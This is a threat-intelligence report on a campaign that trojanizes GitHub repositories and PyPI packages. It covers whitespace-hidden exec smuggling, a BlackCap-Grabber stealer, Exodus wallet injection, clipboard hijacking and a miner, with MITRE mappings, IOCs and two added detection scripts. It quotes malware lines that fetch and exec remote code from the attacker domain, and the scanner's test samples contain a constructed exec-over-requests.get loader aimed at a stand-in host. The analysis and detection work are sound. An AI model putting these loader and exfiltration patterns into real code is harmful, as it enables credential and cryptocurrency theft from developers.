Keypoints
- Threat actors clone and trojanize popular GitHub repositories (e.g., discord-boost-tool) and publish malicious PyPI packages to reach developers and users.
- The primary initial technique, “exec smuggling,” hides an encrypted payload off-screen behind a long run of whitespace, decrypts it with Fernet, and passes the result (or the body of a requests.get() response) to Python exec().
- The second-stage dropper installs Python dependencies, enumerates installed Python versions and Cryptodome directories, writes a decryptor (pl.py) to %APPDATA%, and runs it with the window hidden.
- Final payload includes a modified BlackCap-Grabber stealer (browser passwords, cookies, app credentials, clipboard hijack) and Exodus-specific injection to harvest wallet passwords and mnemonics.
- Exodus compromise is achieved by replacing the app.asar archive of the Electron-based wallet; if Exodus is absent, the dropper instead places a startup script (stromrechnung.py) that installs a miner (miner.exe) and persists.
- Network behavior uses HTTP GET/POST to attacker domains (e.g., bananasquad[.]ru) for C2, payload retrieval, and exfiltration to /handler and /downlodhandler endpoints.
- Obfuscation and delivery methods include base64, compression (zlib/gzip/lzma), marshal, hex/bytes.fromhex, and encrypted Fernet blobs; execution often uses subprocess.Popen and exec(compile(…)).
MITRE Techniques
- [T1195] Supply Chain Compromise – Actors trojanized public code repositories and PyPI packages to distribute malicious droppers and stealers: ‘[cloned legitimate GitHub repositories … and then trojanized and infected them with malicious code]’
- [T1059.006] Command and Scripting Interpreter: Python – Malicious stages are executed dynamically via Python exec(), e.g., ‘[exec(requests.get('hxxps[://]bananasquad[.]ru/paste').text.replace(…).replace(…))]’
- [T1105] Ingress Tool Transfer – Secondary stages and malicious app.asar files are downloaded from attacker-controlled infrastructure using web requests: ‘[exec(requests.get(…).text …)]’
- [T1027] Obfuscated Files or Information – Payloads are hidden using long whitespace, Fernet encryption, base64, compression, and marshal to conceal C2 details and code: ‘<WHITESPACE>;exec(Fernet(b'n4URWLeT…').decrypt(b'…'))’
- [T1041] Exfiltration Over C2 Channel – Stolen credentials, cookies, and wallet data are sent to attacker endpoints via HTTP POST to handler paths: ‘[the attacker sends a POST request containing the exfiltrated passwords, cookies, and cryptocurrency addresses to the attacker’s infrastructure.]’
- [T1071.001] Application Layer Protocol: Web Protocols – C2 and data transfer use HTTP(S) via requests.get()/POST calls: ‘[exec(requests.get(…))]’
- [T1056.003] Input Capture: Clipboard Data – Malware hijacks the Windows clipboard to replace cryptocurrency addresses with the attacker’s address: ‘[Hijacking the Windows clipboard to alter cryptocurrency addresses, replacing its content with the attacker’s wallet address]’
- [T1547.001] Boot or Logon Autostart Execution: Startup Folder – If Exodus isn’t present, the dropper places stromrechnung.py in the Windows Startup folder to persist: ‘[download the file stromrechnung.py to Microsoft\Windows\Start Menu\Programs\Startup]’
- [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – The startup script writes batch logic using Living-off-the-Land drivers (LoLDrivers) to bypass UAC and run a miner: ‘[Write the logic using Living off the Land Drivers (LoLDrivers) to bypass UAC]’
Indicators of Compromise
- [Domain] C2/payload host – bananasquad[.]ru (used in requests.get(‘hxxps://bananasquad[.]ru/paste’))
- [HTTP endpoints] Exfiltration and handlers – /handler, /downlodhandler (POST requests carrying usernames, passwords, cookies)
- [File names] Droppers and persistence – pl.py (decryptor in %APPDATA%), stromrechnung.py (startup persistence), miner.exe (downloaded miner)
- [Repository / user] Compromised GitHub artifacts – discord-boost-tool (Wieselnuggis), forks originating from suspected PatrickPagoda repositories
- [Packages] Malicious PyPI examples – pipcoloringskitsV1, pipcryptomodulesV1, and dozens of similarly named packages used to deliver stage-2 droppers
- [Paths] Targeted ElectronJS app archive locations – %LOCALAPPDATA%\exodus\app-xx.x.xx\resources\app.asar, /usr/lib/exodus/resources/app.asar
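Detection logic for the network indicators above, as an added example (not code from the report or from the malware it describes): it parses a Squid-style proxy access log, refangs bananasquad[.]ru for matching, and tags requests that hit the C2 domain, the /paste stage fetch, or the /handler and /downlodhandler exfiltration POSTs. The log format, every log line and the client/server IPs below are constructed (documentation ranges), not observed traffic.

```python
"""Match web-proxy log lines against the network IOCs from the report.

Added example, not code from the report or the malware. The log format
(a Squid native access.log) and every log line in SAMPLE_LOG are constructed.
"""
import re
from urllib.parse import urlsplit

# IOCs from the report. The domain is defanged there (bananasquad[.]ru);
# it is refanged here so it can be compared against real log data.
C2_DOMAINS = {"bananasquad.ru"}
EXFIL_PATHS = {"/handler", "/downlodhandler"}   # exfiltration POST handlers (sic)
STAGE_PATHS = {"/paste"}                          # next stage fetched by exec(requests.get(...))

# Squid native format: time elapsed client result/code size method URL user hier/host type
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<user>\S+)\s+"
    r"(?P<hier>\S+)\s+(?P<ctype>\S+)$"
)

# Constructed sample log: three hits on the C2 host, one benign PyPI fetch,
# and one POST to a handler-style path on an unrelated host.
SAMPLE_LOG = """\
1718000000.123     85 10.0.0.12 TCP_MISS/200 5123 GET http://bananasquad.ru/paste - HIER_DIRECT/203.0.113.5 text/plain
1718000001.456    120 10.0.0.12 TCP_MISS/200 210 POST http://bananasquad.ru/handler - HIER_DIRECT/203.0.113.5 text/html
1718000002.789     90 10.0.0.12 TCP_MISS/200 180 POST http://bananasquad.ru/downlodhandler - HIER_DIRECT/203.0.113.5 text/html
1718000003.000     40 10.0.0.33 TCP_MISS/200 9876 GET https://pypi.org/simple/requests/ - HIER_DIRECT/198.51.100.7 text/html
1718000004.000     60 10.0.0.33 TCP_MISS/200 300 POST http://www.example.com/handler - HIER_DIRECT/192.0.2.8 text/html
"""


def classify(line):
    """Return the alert tags for one access-log line (empty list if nothing matched)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ["unparsed"]
    url = urlsplit(m["url"])
    host = (url.hostname or "").lower()
    path = url.path or "/"
    method = m["method"]
    tags = []
    if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
        tags.append("c2-domain")
        if method == "POST" and path in EXFIL_PATHS:
            tags.append("exfil-post")
        if method == "GET" and path in STAGE_PATHS:
            tags.append("stage-fetch")
    elif method == "POST" and path in EXFIL_PATHS:
        # Same handler path on an unknown host: weaker signal, but worth triage
        # because the C2 domain is trivially rotated while the handler code is not.
        tags.append("suspicious-handler-path")
    return tags


def scan(log_text):
    """Return (client, method, url, tags) for every line that produced a tag."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line.strip())
            hits.append((m["client"], m["method"], m["url"], tags))
    return hits


if __name__ == "__main__":
    for client, method, url, tags in scan(SAMPLE_LOG):
        print(f"{client:<12} {method:<5} {url:<50} {','.join(tags)}")
```

The host match is exact or subdomain-based rather than a substring search, so a benign name that merely contains the string is not flagged; the handler-path fallback is deliberately reported with its own tag so an analyst can weight it below a domain hit.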
The infection chain begins with cloned GitHub repositories or malicious PyPI packages into which the attacker injects an “exec smuggling” construct: a long whitespace sequence pushes an encrypted payload off-screen, the payload is decrypted with Fernet and executed with Python exec(), and the next stage is typically retrieved via requests.get() from an attacker-controlled web host. The stage-2 dropper then installs Python dependencies (requests, httpx, pyperclip, pyotp, pycryptodomex, etc.), enumerates installed Python versions, duplicates the Cryptodome package directory to Crypto when present, writes a decryptor file (pl.py) into %APPDATA% and executes it without a visible window, and uses subprocess.Popen for process creation and further payload execution.
The final payload set includes a modified BlackCap-Grabber stealer with browser credential/cookie collection, system information gathering, token-stealing bypasses, clipboard hijacking that replaces cryptocurrency addresses, and Exodus-specific injection logic. For Exodus, the malware checks the common app.asar locations, downloads a malicious app.asar from attacker infrastructure, kills the legitimate Exodus process, and overwrites the archive so that the wallet exfiltrates passwords, mnemonic phrases, and wallet directories via HTTP POSTs to the attacker's handlers. If Exodus is absent, the code drops stromrechnung.py into the Startup folder; that script creates a batch file that leverages LoLDrivers to bypass UAC and fetches and runs miner.exe for coin mining.
Delivery and obfuscation techniques observed include numerous forms of encoded and compressed payloads (base64, bytes.fromhex/hex, marshal, zlib/gzip/lzma), encrypted blobs decrypted via Fernet, and dynamic execution patterns such as exec(compile(…)) and exec(marshal.loads(…)). Network behavior centers on HTTP-based C2 (requests.get/POST) to specific domains and endpoints, and persistence and exfiltration are achieved through startup autorun entries, overwritten Electron archives, and HTTP POST handlers that collect harvested credentials and wallet data.
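A static check for the delivery constructs described above (the whitespace-hidden exec(Fernet(...).decrypt(...)) smuggle, exec() over a requests.get() response, and exec/eval over base64/zlib/marshal/bytes.fromhex/compile chains), as an added example that is not code from the report or from the malware. The four SAMPLES are constructed stand-ins for those constructs: the key and ciphertext bytes are placeholders, the URL uses an example host, and nothing in the samples is executed; they are only parsed. The 40-space threshold and the set of suspicious call names are assumptions chosen for illustration.

```python
"""Flag "exec smuggling" and dynamic-execution loader chains in Python source.

Added example, not code from the report or the malware it describes. The
samples below are constructed; they are parsed with `ast`, never executed.
"""
import ast
import re

# Callee names that, when nested under exec()/eval(), characterise the loader
# chains described in the text. requests/httpx get/post are matched on the
# module name so a plain dict.get() is not flagged. (Assumed heuristic set.)
DECODE_CALLS = {
    "decrypt", "b64decode", "decompress", "loads", "fromhex", "compile",
    "requests.get", "requests.post", "httpx.get", "httpx.post",
}
DYNAMIC_EXEC = {"exec", "eval"}

# Text-level check: a run of 40+ spaces/tabs followed by ';exec(' or ';eval('
# pushes the real statement past the editor's viewport. (Assumed threshold.)
SMUGGLE_RE = re.compile(r"[ \t]{40,};\s*(exec|eval)\s*\(")

# Constructed samples (placeholders only).
SAMPLES = {
    "smuggled_fernet": (
        "from cryptography.fernet import Fernet\n"
        "print('setting up...')" + " " * 200 +
        ";exec(Fernet(b'PLACEHOLDER_KEY=').decrypt(b'gAAAAA_PLACEHOLDER'))\n"
    ),
    "remote_stage": (
        "import requests\n"
        "exec(requests.get('http://c2.example/paste').text.replace('\\n', '').replace(' ', ''))\n"
    ),
    "marshal_chain": (
        "import base64, marshal, zlib\n"
        "exec(marshal.loads(zlib.decompress(base64.b64decode(b'eJwLSc0tAAAH'))))\n"
    ),
    "benign": (
        "import json\n"
        "cfg = json.loads(open('cfg.json').read())\n"
        "print(cfg.get('name'))\n"
    ),
}


def _call_name(node):
    """Name of a Call's callee: 'exec', 'decrypt', 'requests.get', ... ('' if unknown)."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        if f.attr in ("get", "post") and isinstance(f.value, ast.Name):
            return f"{f.value.id}.{f.attr}"      # requests.get / httpx.post
        return f.attr                            # .decrypt, .b64decode, .loads, .fromhex
    return ""


def _decode_chain(node):
    """Suspicious callee names nested anywhere under node, outermost first."""
    found = []

    def visit(n):
        if isinstance(n, ast.Call):
            name = _call_name(n)
            if name in DECODE_CALLS:
                found.append(name)
        for child in ast.iter_child_nodes(n):
            visit(child)

    visit(node)
    return found


def scan_source(src):
    """Return findings as (line_no, kind, detail) tuples for one source file."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if SMUGGLE_RE.search(line):
            findings.append((lineno, "whitespace-smuggling",
                             f"{len(line)} chars, exec/eval after a long blank run"))
    try:
        tree = ast.parse(src)
    except SyntaxError as e:
        findings.append((e.lineno or 0, "unparsable", str(e)))
        return findings
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) in DYNAMIC_EXEC and node.args:
            chain = _decode_chain(node.args[0])
            if chain:
                findings.append((node.lineno, "dynamic-exec",
                                 "exec/eval over " + " -> ".join(chain)))
    return findings


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_source(src) or "clean")
```

The AST pass only reports decode/fetch calls that sit under an exec() or eval() argument, which is why the benign sample's json.loads() and dict.get() produce nothing; the regex pass is independent of parsing, so it still fires on a file the parser rejects.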